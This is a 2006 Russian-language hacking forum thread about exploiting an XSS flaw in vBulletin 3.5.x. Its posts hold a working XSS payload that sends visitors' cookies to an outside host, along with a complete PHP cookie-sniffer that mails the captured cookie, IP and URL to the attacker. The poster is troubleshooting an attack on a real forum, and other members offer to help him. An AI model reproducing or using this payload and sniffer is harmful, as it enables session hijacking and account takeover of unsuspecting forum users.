Форумы Уязвимости в vBulletin v3.5.x ( test: v3.5.4 )

Discussion in 'Уязвимости CMS/форумов' started by liauliau, 20 Apr 2006.

  1. Зверь

    Зверь New Member

    Joined:
    18 May 2006
    Messages:
    16
    Likes Received:
    2
    Reputations:
    4
    да,видео смотрел.НО там автор пишет этот код в подпись,а в моем случае подпись запрещена.
    На форуме хтмл код включен.Что можно сделать?
    В видео автор вставляет этот код <pre a='>' onmouseover='document.location="http://coolmoto.jino-net.ru/downloads/exploit.php?c="+document.cookie' b='</pre' >,и ему на почту приходят куки,НО у меня он не срабатывает,ничего не шлет,хотя сплоит я настроил
     
  2. nix

    nix Banned

    Joined:
    7 May 2006
    Messages:
    33
    Likes Received:
    3
    Reputations:
    -5
    ГЫгы, это спотря какой снифер у тебя
     
  3. Зверь

    Зверь New Member

    Joined:
    18 May 2006
    Messages:
    16
    Likes Received:
    2
    Reputations:
    4
    Снифер из той же статья,настройка там всего одна,адрес почты
     
  4. liauliau

    liauliau Member

    Joined:
    9 Apr 2005
    Messages:
    30
    Likes Received:
    6
    Reputations:
    -1
    дай адрес форумa - лп
     
  5. Зверь

    Зверь New Member

    Joined:
    18 May 2006
    Messages:
    16
    Likes Received:
    2
    Reputations:
    4
    liauliau-наисал в ЛП
     
  6. liauliau

    liauliau Member

    Joined:
    9 Apr 2005
    Messages:
    30
    Likes Received:
    6
    Reputations:
    -1

    HTML код Выкл. :mad:
     
  7. Зверь

    Зверь New Member

    Joined:
    18 May 2006
    Messages:
    16
    Likes Received:
    2
    Reputations:
    4
    да включен там код хтмл,но не для всех,а толко для определеных групп...
    Подскажи почему на сниф ничего неприходит?
     
  8. Зверь

    Зверь New Member

    Joined:
    18 May 2006
    Messages:
    16
    Likes Received:
    2
    Reputations:
    4
    Вот посмотри что неправильно в моих дейсивиях
    1-Залил на сайт эксплоит с такими данными
    <?php
    $ip_adresse = $_SERVER['REMOTE_ADDR'];
    if(!empty($ip_adresse))
    {
    echo 'il tuo ip и: ',$ip_adresse;
    }
    else
    {
    echo 'Impossible d\'afficher l\'IP';
    }
    ?>

    <a href="log.php"></a><?
    $xx1=$HTTP_SERVER_VARS['SERVER_PORT'];
    $day = date("d",time()); $month = date("m",time()); $year = date("Y",time());
    if ($REMOTE_HOST == "") $visitor_info = $REMOTE_ADDR;
    else $visitor_info = $REMOTE_HOST;
    $base = 'http://' . $HTTP_SERVER_VARS['SERVER_NAME'] . $PHP_SELF;
    $x1=`host $REMOTE_ADDR|grep Name`;
    $x2=$REMOTE_PORT;
    ?>

    <?php
    $cookie = $_GET['c'];
    ?>

    <?php
    $myemail = "shport-maksim@yandex.ru";
    $today = date("l, F j, Y, g:i a") ;
    $subject = "Xss Vbulletin" ;
    $message = "Xss: Hacking
    Ip: $ip_adresse
    Cookie: $cookie
    Url: $base
    porta usata: $xx1
    remote port: $x2
    Giorno & Ora : $today \n
    ";
    $from = "From: $myemail\r\n";
    mail($myemail, $subject, $message, $from);
    ?>
    2-на форуме просто в новом сообщении написал вот это
    <pre a='>' onmouseover='document.location="http://coolmoto.jino-net.ru/downloads/exploit.php?c="+document.cookie' b='</pre' >
    Что не ТАК?
     
  9. Зверь

    Зверь New Member

    Joined:
    18 May 2006
    Messages:
    16
    Likes Received:
    2
    Reputations:
    4
    liauliau-помоги пожалуйста.
    У тебя есть аська?
     
  10. liauliau

    liauliau Member

    Joined:
    9 Apr 2005
    Messages:
    30
    Likes Received:
    6
    Reputations:
    -1
    не знаю что ты там делаешь ? дай форум где включен код хтмл я тебе зделаю видео ;)
     
  11. liauliau

    liauliau Member

    Joined:
    9 Apr 2005
    Messages:
    30
    Likes Received:
    6
    Reputations:
    -1
    Видео > тут
     
    #31 liauliau, 20 May 2006
    Last edited: 23 May 2006
Loading...